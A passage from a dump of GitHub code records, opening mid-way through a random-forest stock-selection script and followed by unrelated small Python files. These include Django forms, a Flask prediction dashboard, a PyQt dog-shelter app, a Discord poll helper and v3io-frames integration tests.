t=train[(pd.to_datetime(day)-timedelta(days=180)).strftime(\"%m/%d/%Y\"):(pd.to_datetime(day)-timedelta(days=35)).strftime(\"%m/%d/%Y\")]\r\n x_train=t.iloc[:,:-1]\r\n y_train=t.iloc[:,-1]\r\n x_predict=p[day].iloc[:,:-1]\r\n real_predict=p[day].iloc[:,-1]\r\n rf = RandomForestClassifier(n_estimators=100,oob_score=True)\r\n rf.fit(x_train,y_train)\r\n correct1.append (rf.score(x_predict, real_predict))\r\n correct2.append (rf.score(x_train, y_train))\r\n y_predict=rf.predict(x_predict)\r\n pos={}\r\n position=[]\r\n for i in range(len(y_predict)):\r\n if y_predict[i]==1:\r\n pos[x_predict.index[i]]=x_predict.S_DQ_ADJCLOSE[i]\r\n position.append(x_predict.index[i])\r\n length=len(pos)\r\n# if length<5:\r\n# pos['000001.SH']=SS.loc[pd.to_datetime(key)].S_DQ_ADJCLOSE\r\n pop_list=[]\r\n hold[day]=position\r\n for key,value in pos.items():\r\n df=stock_all[key][day[4:6]+'/1/'+day[:4]:day[4:6]+'/'+str(calendar.monthrange(int(day[:4]),int(day[4:6]))[1])+'/'+day[:4]]\r\n for j in range(len(df)):\r\n if (df.S_DQ_ADJCLOSE[j]-value)/value<-0.05:\r\n pop_list.append(key)\r\n net_value=net_value+(df.S_DQ_ADJCLOSE[j]-value)*net_value/length/value*1.006\r\n break\r\n if not key in pop_list:\r\n net_value=net_value+(df.S_DQ_ADJCLOSE[-1]-value)*net_value/length/value*0.994\r\n pnl.append(net_value)\r\n hold_all.append(hold)\r\n draw['NetValue'+str(k)]=pnl\r\nind.remove('20100104')\r\ndraw.index=ind\r\nindex=[]\r\nfor day in p.keys():\r\n if day!='20100104' and day!='20100201':\r\n 
index.append(SS.ix[SS.index.tolist().index(pd.to_datetime(day))-1].sclose/SS.loc[pd.to_datetime('20100301')].sclose)\r\nindex.append(SS.loc[pd.to_datetime('20180629')].sclose/SS.loc[pd.to_datetime('20100301')].sclose)\r\ndraw['index']=index\r\ndraw.plot()\r\n\r\ndf_collect=[]\r\nfor cnt in range(5):\r\n df = pd.DataFrame()\r\n for key,values in hold_all[cnt].items():\r\n local_df = pd.DataFrame(index=[key],data=np.array([values]))\r\n df = pd.concat([df,local_df])\r\n df.to_excel('run'+str(cnt)+'.xlsx')\r\n df_collect.append(df)\r\n \r\ndef overlap(df1,df2):\r\n collect = []\r\n for i in range(len(df1)):\r\n cnt = 0\r\n for j in df1.iloc[i].dropna():\r\n for k in df2.iloc[i].dropna():\r\n if j ==k:\r\n cnt+=1\r\n collect.append(cnt/max(len(df1.iloc[i].dropna()),len(df2.iloc[i].dropna())))\r\n ovp_df = pd.DataFrame(index = df.index,data =collect)\r\n return ovp_df\r\n\r\novp_collect =[]\r\n\r\nfor cnt1 in range(5):\r\n local_ovp_collet=[]\r\n for cnt2 in range(5):\r\n x = overlap(df_collect[cnt1],df_collect[cnt2])\r\n local_ovp_collet.append(x.mean().values[0])\r\n ovp_collect.append(local_ovp_collet)\r\n\r\nsns.heatmap(ovp_collect)\r\n\r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n#hold_all是每月月初持仓\r\n","repo_name":"ZTang813/ML-Project-StockSelection","sub_path":"rf.py","file_name":"rf.py","file_ext":"py","file_size_in_byte":9308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32370234117","text":"N = int( input() )\nh = list( map( int, input().split() ) )\n\nans = 0\nfor j in reversed( range( 1, 101 ) ):\n flag = False\n for i in range( N ):\n if flag == True and h[ i ] < j:\n ans += 1\n \n if h[ i ] >= j:\n flag = True\n else:\n flag = False\n \n if flag == True:\n ans += 1\n\nprint( ans )","repo_name":"tsukasa2/AtCoder","sub_path":"practice/ABC/116/abc116-c.py","file_name":"abc116-c.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"45460013357","text":"from django import forms\nfrom book_store.models import Author\n\nclass AuthorForm(forms.Form):\n image=forms.FileField()\n name=forms.CharField(max_length=50)\n\nclass AuthorFormModel(forms.ModelForm):\n class Meta:\n model = Author\n fields =\"__all__\"\n\n labels={\n 'name':\"Enter Author Name\",\n 'email':'Enter Author Email',\n 'phone':'Enter Author Phone Number',\n 'profile':'Upload Profile Picture'\n }","repo_name":"Daniel-Karanja/Enemy-Of-Syntax-Learn-Django","sub_path":"FILES/files/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"4558638846","text":"import numpy as np\nimport mfd\nfrom matplotlib import pyplot as pl\n\nn = 30\nxr = np.linspace(0, 2*1.5, int(n*1.5))\nyr = np.linspace(0, 2, n)\nx, y = np.meshgrid(xr, yr)\nz = np.exp(-x*x-y*y)\nw = abs(xr[0]-xr[1])\na = mfd.sca(z, w)\nb = np.load('data.npy')\npl.pcolormesh(x, y, (a-b)/a)\npl.colorbar()\nax = pl.gca()\nax.set_aspect('equal')\npl.show()\n","repo_name":"UP-RS-ESP/GEW-DAP05-2018","sub_path":"Session_07/mfdrouting/bench.py","file_name":"bench.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"17960713721","text":"from django import forms\nfrom .models import Dish\n\n\nclass DishForm(forms.ModelForm):\n\n class Meta:\n model = Dish\n fields = '__all__'\n labels = {'name': 'Name of 
Dish'}\n field_classes = {\n 'chefs': forms.ModelMultipleChoiceField,\n }\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.fields['recipe'].required = False\n self.fields['ingredients'].required = False\n","repo_name":"DS-dsn1/Django_restaurant","sub_path":"restaurant/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33321162398","text":"#extra_life.py\n\nimport collidable, util, pyglet, aabb\n\npyglet.resource.path.append('./images')\npyglet.resource.reindex()\n\npwrup_image=pyglet.resource.image('explosion.png')\nutil.center_image(pwrup_image)\n\n\nclass Extra_life(collidable.Collidable):\n \n def __init__(self, *args, **kwargs):\n super(Extra_life,self).__init__(pwrup_image,*args,**kwargs)\n self.scale=0.3\n self.is_pwrup=True\n \n self.lower_bound=((self.x-self.width//2),(self.y-self.height//2))\n self.upper_bound=((self.x+self.width//2),(self.y+self.height//2))\n self.bounding_box=aabb.AABB(self.lower_bound,self.upper_bound)\n\n def update(self,dt):\n pass\n\n def update_bounding_box(self):\n self.lower_bound=((self.x-self.width//2),(self.y-self.height//2))\n self.upper_bound=((self.x+self.width//2),(self.y+self.height//2))\n self.bounding_box=aabb.AABB(self.lower_bound,self.upper_bound)\n \n def handle_collision_with(self,other):\n\n if other.is_avatar:\n self.dead=True\n \n","repo_name":"AgnesIrwin/Template-B","sub_path":"game/extra_life.py","file_name":"extra_life.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16915831639","text":"import json\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport logging\n\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\nimport plotly\n\nfrom data_retriever.retriever import get_daily_historical\nfrom utils.plot_factory import plot_historical_with_predicted_data\nimport utils.defaults as defaults\nfrom utils.data_elaboration import prepare_data, clean_data\nfrom utils.modelling import load_model\n\n\napp = Flask(__name__)\nlogger = logging.getLogger(__name__)\n\n# index webpage displays cool visuals\n@app.route('/')\n@app.route('/index')\ndef index():\n\n figures = list()\n\n # start_date = datetime.datetime(2016, 1, 1)\n # end_date = datetime.datetime(2020, 8, 31)\n end_date = datetime.datetime.now()\n extra_days = max(defaults.PREDICTION_HORIZONS) + defaults.EXTRA_DATA_PERIODS\n start_date = end_date - datetime.timedelta(days=defaults.DASHBOARD_DATA_WINDOW_DAYS + extra_days)\n\n regression_results = dict()\n for horizon in defaults.PREDICTION_HORIZONS:\n regression_results[f\"regression_result_{horizon}d\"] = dict()\n\n for symbol in defaults.SYMBOLS.keys():\n\n logger.info(f\"Performing regression for symbol: {symbol}\")\n model = load_model(f\"../models/production_models/models_{symbol}.dump\")\n\n # get OHLCV data\n data = get_daily_historical(symbol, start_date, end_date)\n\n data = clean_data(data)\n regression_input, _ = prepare_data(data.copy(), delays=defaults.PREDICTION_HORIZONS)\n regression_input = regression_input[-1, :].reshape(1, -1)\n\n # compute predictions\n regression_outputs = model.predict(regression_input)[-1]\n\n current_price = data['Adj Close'].iloc[-1]\n regression_pct_returns = 100 * (regression_outputs - current_price) / current_price\n regression_pct_returns = np.round(regression_pct_returns, 
decimals=2)\n\n # create dataframe for predicted data, first data-value current Adj. price\n predicted_data = pd.DataFrame(index=[data.index[-1]],\n data=[[data.iloc[-1]['Adj Close']] * 4],\n columns=[f\"Adj Close - {horizon}d_prediction\" for horizon in defaults.PREDICTION_HORIZONS])\n\n for count, horizon in enumerate(defaults.PREDICTION_HORIZONS):\n regression_results[f\"regression_result_{horizon}d\"].update({symbol: regression_pct_returns[count]})\n\n # append 1day prediction\n predicted_data = predicted_data.append(pd.DataFrame(index=[data.index[-1] + pd.Timedelta(days=horizon)],\n data=[regression_outputs[count]],\n columns=[f\"Adj Close - {horizon}d_prediction\"]))\n\n # plot data\n fig = plot_historical_with_predicted_data(symbol, data, predicted_data, return_fig=True)\n figures.append(fig)\n\n # encode plotly graphs in JSON\n ids = ['figure-{}'.format(i) for i, _ in enumerate(figures)]\n # Convert the plotly figures to JSON for javascript in html template\n figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)\n\n return render_template('index.html',\n ids=ids,\n figuresJSON=figuresJSON,\n **regression_results)\n\n\ndef main():\n app.run(host='0.0.0.0', port=8080, debug=True)\n\n\nif __name__ == '__main__':\n main()","repo_name":"marc0f/UDACITY_DSND_5-Investment_and_Trading_Capstone_Project","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18007030226","text":"\"\"\" It returns the coordinates of a given direction.\n Example: FRONT -> -1,0\n LEFT -> 0,-1\n\"\"\"\nfrom Constants import *\n\nmap_direction_coordinates = {\n 0: [-1,0],\n 1: [0, 1],\n 2: [1, 0],\n 3: [0,-1]\n}\n\nopposite_directions = {\n LEFT: RIGHT,\n RIGHT: LEFT,\n FRONT: BACK,\n BACK: FRONT\n}\n\n\"\"\" This is used to obtain the orthogonal directions for a given direction.\n Examples: FRONT -> orthogonals are [LEFT, RIGHT]\n RIGHT -> orthogonals are [FRONT, DOWN]\n\"\"\"\northogonal_directions = {\n 0: [[0,-1, LEFT],[0,1, RIGHT]], # ↑: (←,→)\n 1: [[-1,0, FRONT],[1,0, BACK]], # →: (↑,↓)\n 2: [[0,1, RIGHT],[0,-1, LEFT]], # ↓: (←,→)\n 3: [[-1,0, FRONT],[1,0, BACK]] # ←: (↑,↓)\n}\n\n\"\"\" It returns the coordinates of a given direction.\n Example: FRONT -> -1,0\n LEFT -> 0,-1\n\"\"\"\nmap_direction_coordinates = {\n 0: [-1,0],\n 1: [0, 1],\n 2: [1, 0],\n 3: [0, -1]\n}","repo_name":"jcrecio/s_traffic","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16162483608","text":"import sqlite3\r\n\r\nfrom PyQt5.QtWidgets import QMainWindow\r\n\r\nfrom designers.choose_window_designer import Ui_SecondWindow\r\nfrom windows.result_window import ResultWindow\r\nfrom PyQt5.QtGui import QPixmap\r\n\r\n\r\nclass SecondWidget(QMainWindow, Ui_SecondWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.setupUi(self)\r\n self.setWindowTitle(\"choose\")\r\n self.btn_back_to_main_menu.clicked.connect(self.back_to_main_menu)\r\n self.btn_choose.clicked.connect(self.choose)\r\n self.btn_next.clicked.connect(self.next)\r\n self.dog_number = 1 # изменение номера собаки на 1, то есть теперь\r\n # это номер второй собаки, тк первую мы вывели еще до перехода в это окно\r\n\r\n def back_to_main_menu(self):\r\n self.hide()\r\n\r\n def next(self):\r\n if len(self.selected_dogs_file_names) == 1: # Изменение значения номера собаки на 
0\r\n self.dog_number = 0 # если есть всего одна подходящая собака\r\n self.pixmap = QPixmap(f\"images\\{self.selected_dogs_file_names[self.dog_number][0]}.png\")\r\n # отображение следующей из подходящих собак, если есть всего одна такая собака,\r\n # то выводится та же картинка\r\n self.image_lbl.setPixmap(self.pixmap)\r\n self.dog_number_now = self.dog_number # текущий номер собаки\r\n self.dog_number += 1\r\n\r\n if self.dog_number > len(self.selected_dogs_file_names) - 1: # перезапуск очереди\r\n self.dog_number = 0 # из подходящих собак\r\n\r\n def choose(self):\r\n con = sqlite3.connect(\"dog_shelter_db\")\r\n cur = con.cursor()\r\n cur.execute(\"\"\"UPDATE dogs\r\n SET is_taken = \"yes\"\r\n WHERE dog_image_file_name == :dog_filename\r\n \"\"\", {'dog_filename': self.selected_dogs_file_names[self.dog_number_now][0]})\r\n con.commit()\r\n con.close()\r\n\r\n self.res = ResultWindow()\r\n self.hide()\r\n self.res.show()\r\n","repo_name":"dimondg/dog_shelter","sub_path":"windows/choose_window.py","file_name":"choose_window.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"37342521597","text":"import json\nfrom tqdm import tqdm\nimport random\n\ncategory_id = 1 # 1:visible body 2:full body 3:head 4:vehicle\njson_path = \"/root/data/gvision/dataset/train/ruby_output/dyy_split_visiblebody.json\"\nodgt_path = \"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_tvp_fusion.odgt\"\nodgt_train_append_path = \"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_train.odgt\"\nodgt_test_append_path = \"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_val.odgt\"\ndef coco2crowdhuman(odgt_path,json_path,odgt_train_append_path,odgt_test_append_path):\n with open(json_path, 'r') as load_f:\n json_dict = json.load(load_f)\n images = json_dict[\"images\"]\n annos = json_dict[\"annotations\"]\n odgt = list()\n pbar = tqdm(total=len(images), ncols=50)\n for image in images:\n odgt_one = dict()\n odgt_one[\"ID\"] = image[\"file_name\"][0:-4]\n image_id = image[\"id\"]\n gtboxes = list()\n box_id = 0\n for anno in annos:\n if anno[\"image_id\"] == image_id and anno[\"category_id\"] == category_id:\n gtbox = dict()\n\n gtbox[\"tag\"] = \"person\"\n gtbox[\"hbox\"] = [0, 0, 0, 0]\n gtbox[\"head_attr\"] = {\"ignore\": 0, \"occ\": 1, \"unsure\": 0}\n\n # visible body\n gtbox[\"fbox\"] = [0, 0, 0, 0]\n gtbox[\"vbox\"] = anno[\"bbox\"]\n\n # full body\n # gtbox[\"fbox\"] = anno[\"bbox\"]\n # gtbox[\"vbox\"] = [0, 0, 0, 0]\n\n extra = dict()\n extra[\"box_id\"] = box_id\n box_id += 1\n extra[\"occ\"] = 1\n gtbox[\"extra\"] = extra\n\n gtboxes.append(gtbox)\n\n odgt_one[\"gtboxes\"] = gtboxes\n odgt.append(odgt_one)\n pbar.update(1)\n pbar.close()\n odgtvp=odgt\n odgttp=odgt\n\n with open(odgt_train_append_path, 'r') as load_f:\n for line in load_f.readlines():\n odgt.append(line[0:-1])\n odgttp.append(line[0:-1])\n\n with open(odgt_test_append_path, 'r') as load_f:\n for line in load_f.readlines():\n odgt.append(line[0:-1])\n odgtvp.append(line[0:-1])\n\n print(odgt[1])\n random.shuffle(odgt)\n print(odgt[1])\n random.shuffle(odgtvp)\n random.shuffle(odgttp)\n\n\n\n with open(odgt_path, \"w\") as f:\n for line in odgt:\n f.write(str(line) + '\\n')\n \n with open(\"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_vp_fusion.odgt\", \"w\") as f:\n for line in odgtvp:\n f.write(str(line) + '\\n')\n \n with 
open(\"/root/data/gvision/CrowdDet-master/data/CrowdHuman/annotation_tp_fusion.odgt\", \"w\") as f:\n for line in odgttp:\n f.write(str(line) + '\\n')\n\ncoco2crowdhuman(odgt_path,json_path,odgt_train_append_path,odgt_test_append_path)","repo_name":"Harzva/gigavision","sub_path":"my_tools/2odgt.py","file_name":"2odgt.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"27646930299","text":"import asyncio\nfrom enum import Enum\n\nimport discord\n\nimport src.config as config\nfrom src.discord.helpers import KnownGuild\nfrom src.discord.helpers.waiters import MemberWaiter\n\n\nclass SimpleVote:\n class Option(Enum):\n yes = \"✅\"\n no = \"❎\"\n skip = \"❓\"\n\n __slots__ = (\"option\", \"count\")\n\n def __init__(self, option: Option, count: int = 0):\n self.option = option\n self.count = count\n\n def increment_count(self):\n self.count += 1\n\n\nclass SimplePoll:\n \"\"\"A simple event based vote, wont be 'finished' until every member in the channel reacted.\"\"\"\n\n @classmethod\n def add_guild_data(cls, guild_id: int, vote_channel_id: int, result_channel_id: int):\n cls.guild_data[guild_id] = {\"vote_channel\": vote_channel_id, \"result_channel\": result_channel_id}\n\n options = [x.value for x in SimpleVote.Option]\n\n guild_data = {}\n\n __slots__ = (\"message\", \"question\", \"votes\", \"member_count\")\n\n def __init__(self, message: discord.Message, votes: list, member_count: int):\n self.message = message\n self.question = message.content\n self.votes = votes\n self.member_count = member_count\n\n @classmethod\n async def from_payload(cls, payload) -> \"SimplePoll\":\n channel = config.bot.get_channel(payload.channel_id)\n message = await channel.fetch_message(payload.message_id)\n votes = await cls.get_votes(message)\n member_count = len([x for x in message.channel.members if not cls.should_skip_member(x)])\n\n return cls(message, votes, member_count)\n\n @classmethod\n def is_eligible(cls, payload) -> bool:\n if payload.member is None or payload.member.bot:\n return False\n if str(payload.emoji) not in cls.options:\n return False\n if payload.guild_id is None:\n return False\n\n channel_data = cls.guild_data.get(payload.guild_id)\n if channel_data is None:\n return False\n if payload.channel_id != channel_data[\"vote_channel\"]:\n return False\n\n return True\n\n @classmethod\n async def get_votes(cls, message: discord.Message) -> list:\n reactions = [x for x in message.reactions if str(x.emoji) in cls.options]\n all_user_ids = set()\n votes = []\n for reaction in reactions:\n vote = SimpleVote(SimpleVote.Option(str(reaction.emoji)))\n votes.append(vote)\n\n async for user in reaction.users():\n if cls.should_skip_member(user) or user.id in all_user_ids:\n continue\n vote.increment_count()\n all_user_ids.add(user.id)\n\n return votes\n\n @classmethod\n def should_skip_member(cls, member: discord.Member) -> bool:\n should_skip = member.bot\n\n if member.guild.id == KnownGuild.intergalactica and member.id == 120566758091259906:\n should_skip = True\n\n return should_skip\n\n def should_finish(self) -> bool:\n total_votes = sum(x.count for x in self.votes)\n return total_votes >= self.member_count\n\n def is_selfie_vote(self):\n if self.message.guild.id != KnownGuild.intergalactica:\n return False\n return \"selfie access\" in self.message.content.lower() or \"selfie perm\" in self.message.content.lower()\n\n def assign_selfie_role(self):\n user_id = 
MemberWaiter.get_id(self.message.content)\n member = self.message.guild.get_member(user_id)\n if member is None:\n return False\n selfie_role = self.message.guild.get_role(748566253534445568)\n if selfie_role is None:\n return False\n\n asyncio.gather(member.add_roles(selfie_role))\n return True\n\n def finish(self):\n channel = self.message.guild.get_channel(self.guild_data[self.message.guild.id][\"result_channel\"])\n embed = discord.Embed(color=config.bot.get_dominant_color(None))\n\n lines = []\n lines.append(self.question)\n lines.append(\"*(all members finished voting)*\")\n lines.append(\"\\n\")\n\n skip_count = sum(x.count for x in self.votes if x.option == SimpleVote.Option.skip)\n valid_vote_count = self.member_count - skip_count\n\n for vote in self.votes:\n if vote.option == SimpleVote.Option.skip:\n continue\n\n try:\n percentage = (vote.count / valid_vote_count) * 100\n percentage = int(percentage) if percentage % 1 == 0 else percentage\n except ZeroDivisionError:\n percentage = 0\n\n lines.append(f\"{vote.option.value}: {vote.count} **{percentage}%**\")\n\n if vote.option == SimpleVote.Option.yes and percentage == 100:\n if self.is_selfie_vote():\n if self.assign_selfie_role():\n embed.set_footer(text=\"Selfie role assigned.\")\n\n embed.description = \"\\n\".join(lines)\n asyncio.gather(channel.send(embed=embed))\n","repo_name":"claderoki/Intergalactica-Discord-Bot","sub_path":"src/discord/cogs/custom/shared/helpers/simple_poll.py","file_name":"simple_poll.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"1698528645","text":"# рекурсивные функции\n\ndef factorial(n) :\n if n != 0 :\n return n * factorial(n-1)\n return 1\nprint(factorial(5))\n\ndef func(x) : return x\n\na1 = func # присваиваем функции несколько переменных\na2 = a1\nprint(a1(5))\nprint(a2(3))\nprint(func(10))\n\n","repo_name":"bazin1984/Lessons","sub_path":"lesson12_functions/Task12.11.py","file_name":"Task12.11.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"73301064410","text":"\"\"\"\n\"Minha mãe mandou\" é uma das primeiras brincadeiras que crianças \naprendem no Brasil. É uma maneira fácil de definir qual comida será \nescolhida entre as muitas alternativas colocadas no prato do almoço.\n\nMariazinha aprendeu uma versão diferente dessa brincadeira com sua mãe. \nPara fazer sua escolha ela deve repetir K vezes a frase \n\"MI-NHA-MÃE-MAN-DOU-EU-ES-CO-LHER-ES-TE-DA-QUI-MAS-CO-MO-EU-SOU-TEI-MO-\nSA-EU-ES-CO-LHO-ES-TE-DA-QUI\" e para cada sílaba (são 29 sílabas) muda \nda escolha da comida de maneira circular começando no alimento 1, indo \naté o alimento N e retornando ao 1 até esgotar as sílabas das K repetições\nda frase da brincadeira. 
No prato tem N alimentos diferentes.\n\"\"\"\n\n\nimport math\n\nqtdcasos = int(input())\n\nwhile qtdcasos:\n qtdalimentos, qtdrepeticao = input().split()\n\n qtdalimentos = int(qtdalimentos)\n qtdrepeticao = int(qtdrepeticao)\n\n silabas = qtdrepeticao * 29\n\n alimento1 = silabas / qtdalimentos\n\n alimento1 = math.ceil(alimento1)\n\n alimentoescolhido = silabas % qtdalimentos\n\n alimentoescolhido += 1\n\n print(alimento1, alimentoescolhido)\n\n qtdcasos -= 1\n","repo_name":"GuilhermRodovalho/Algoritmos-e-estruturas-de-dados","sub_path":"programaçao-dinamica/01-minha_mae_mandou.py","file_name":"01-minha_mae_mandou.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35121988468","text":"from time import sleep\nfrom uuid import uuid4\n\nimport numpy as np\nimport pandas as pd\nimport pytest\nimport v3io_frames as v3f\nfrom datetime import datetime\nimport pytz\nfrom conftest import has_go, test_backends, protocols, has_session\n\ntsdb_span = 5 # hours\ninteg_params = [(p, b) for p in protocols for b in test_backends]\n\n\ndef csv_df(size):\n data = {\n 'icol': np.random.randint(-17, 99, size),\n 'fcol': np.random.rand(size),\n 'scol': ['val-{}'.format(i) for i in range(size)],\n 'bcol': np.random.choice([True, False], size=size),\n 'tcol': pd.date_range('2018-01-01', '2018-10-10', periods=size),\n }\n\n return pd.DataFrame(data)\n\n\ndef kv_df(size):\n index = ['mike', 'joe', 'jim', 'rose', 'emily', 'dan']\n columns = ['n1', 'n2', 'n3']\n data = np.random.randn(len(index), len(columns))\n return pd.DataFrame(data, index=index, columns=columns)\n\n\ndef stream_df(size):\n end = pd.Timestamp.utcnow().replace(minute=0, second=0, microsecond=0)\n index = pd.date_range(end=end, periods=60, freq='300s')\n columns = ['cpu', 'mem', 'disk']\n data = np.random.randn(len(index), len(columns))\n return pd.DataFrame(data, index=index, columns=columns)\n\n\ndef tsdb_df(size):\n return stream_df(size)\n\n\n# Backend specific configuration. 
None means don't run this step\ntest_config = {\n 'csv': {\n 'df_fn': csv_df,\n 'execute': {\n 'command': 'ping',\n },\n },\n 'kv': {\n 'df_fn': kv_df,\n 'create': None,\n 'execute': None,\n },\n 'stream': {\n 'df_fn': stream_df,\n 'create': {\n 'retention_hours': 48,\n 'shards': 1,\n },\n 'read': {\n 'seek': 'earliest',\n 'shard_id': '0',\n },\n 'execute': None,\n },\n 'tsdb': {\n 'df_fn': tsdb_df,\n 'create': {\n 'rate': '1/m',\n },\n 'read': {\n 'step': '10m',\n 'aggregators': 'avg,max,count',\n 'start': 'now-{}h'.format(tsdb_span),\n 'end': 'now',\n },\n 'execute': None,\n },\n}\n\nschema = v3f.Schema(\n type='type',\n namespace='namesapce',\n name='name',\n doc='doc',\n fields=[\n v3f.SchemaField('field1', '', '', 't1', None),\n v3f.SchemaField('field2', '', '', 't2', None),\n v3f.SchemaField('field3', '', '', 't3', None),\n ],\n)\n\n\n@pytest.mark.parametrize('protocol,backend', integ_params)\ndef test_integration(framesd, session, protocol, backend):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n test_id = uuid4().hex\n size = 293\n table = 'integtest{}'.format(test_id)\n\n addr = getattr(framesd, '{}_addr'.format(protocol))\n client = v3f.Client(addr, **session)\n cfg = test_config.get(backend, {})\n df = cfg['df_fn'](size)\n\n create_kw = cfg.get('create', {})\n if create_kw is not None:\n client.create(backend, table, **create_kw)\n\n write_kw = cfg.get('write', {})\n\n labels = {}\n if backend == 'tsdb':\n labels = {\n 'li': 17,\n 'lf': 3.22,\n 'ls': 'hi',\n }\n\n client.write(backend, table, [df], **write_kw, labels=labels)\n sleep(1) # Let db flush\n\n read_kw = cfg.get('read', {})\n dfs = list(client.read(backend, table=table, iterator=True, **read_kw))\n df2 = pd.concat(dfs)\n\n if backend == 'tsdb':\n compare_dfs_tsdb(df, df2, backend)\n elif backend == 'stream':\n compare_dfs_stream(df, df2, backend)\n else:\n if backend == 'kv':\n # FIXME: Probably the schema\n df2.dropna(inplace=True)\n compare_dfs(df, df2, backend)\n\n df = client.read(backend, table=table, **read_kw)\n assert isinstance(df, pd.DataFrame), 'iterator=False returned generator'\n\n client.delete(backend, table)\n exec_kw = cfg.get('execute', {})\n if exec_kw is not None:\n client.execute(backend, table, **exec_kw)\n\n\ndef compare_dfs(df1, df2, backend):\n assert set(df2.columns) == set(df1.columns), \\\n '{}: columns mismatch'.format(backend)\n for name in df1.columns:\n if name == 'tcol':\n # FIXME: Time zones\n continue\n col1 = df1[name].sort_index()\n col2 = df2[name].sort_index()\n assert len(col1) == len(col2), \\\n '{}: column {} size mismatch'.format(backend, name)\n if col1.dtype == float:\n ok = np.allclose(col1.values, col2.values)\n else:\n ok = col1.equals(col2)\n assert ok, '{}: column {} mismatch'.format(backend, name)\n\n\ndef compare_dfs_stream(df1, df2, backend):\n assert set(df1.columns) < set(df2.columns), 'bad columns'\n\n\ndef compare_dfs_tsdb(df1, df2, backend):\n # TODO\n pass\n\n\ndef test_integration_http_error(framesd):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n c = v3f.HTTPClient(framesd.http_addr, session=None)\n\n with pytest.raises(v3f.ReadError):\n for df in c.read('no-such-backend', table='no such table'):\n pass\n\n\n@pytest.mark.parametrize('protocol', protocols)\ndef test_kv_read_empty_df(framesd, session, protocol):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n if not has_session:\n raise AssertionError(\"No session found\")\n\n backend = 'kv'\n test_id = uuid4().hex\n tableName = 
'integtest{}'.format(test_id)\n\n addr = getattr(framesd, '{}_addr'.format(protocol))\n client = v3f.Client(addr, **session)\n\n index = [str(i) for i in range(1, 4)]\n df = pd.DataFrame(data={'col1': [i for i in range(1, 4)], 'col2': ['aaa', 'bad', 'cffd']}, index=index)\n client.write(backend, table=tableName, dfs=df, condition=\"starts({col2}, 'aaa') AND {col1} == 3\")\n\n df = client.read(backend, table=tableName)\n assert df.to_json() == '{}'\n assert isinstance(df, pd.DataFrame), 'iterator=False returned generator'\n\n client.delete(backend, tableName)\n\n\n@pytest.mark.parametrize('protocol', protocols)\ndef test_datetime(framesd, session, protocol):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n if not has_session:\n raise AssertionError(\"No session found\")\n\n backend = 'kv'\n test_id = uuid4().hex\n tableName = 'integtest{}'.format(test_id)\n\n addr = getattr(framesd, '{}_addr'.format(protocol))\n client = v3f.Client(addr, **session)\n\n col = pd.Series([datetime.now(pytz.timezone(\"Africa/Abidjan\")), datetime.now(pytz.timezone(\"America/Nassau\")), None, datetime.now()])\n df = pd.DataFrame({'col': col})\n client.write(backend, table=tableName, dfs=df)\n\n df = client.read(backend, table=tableName)\n\n client.delete(backend, tableName)\n\n\n@pytest.mark.parametrize('protocol', protocols)\ndef test_timestamp(framesd, session, protocol):\n if not has_go:\n raise AssertionError(\"Go SDK not found\")\n\n if not has_session:\n raise AssertionError(\"No session found\")\n\n backend = 'kv'\n test_id = uuid4().hex\n tableName = 'integtest{}'.format(test_id)\n\n addr = getattr(framesd, '{}_addr'.format(protocol))\n client = v3f.Client(addr, **session)\n\n df = pd.DataFrame({'birthday': [pd.Timestamp('1940-04-25', tz='Asia/Dubai'), pd.Timestamp('1940-04-25', tz='US/Pacific'), None, pd.Timestamp('1940-04-25')]})\n client.write(backend, table=tableName, dfs=df)\n\n df = client.read(backend, table=tableName)\n\n client.delete(backend, 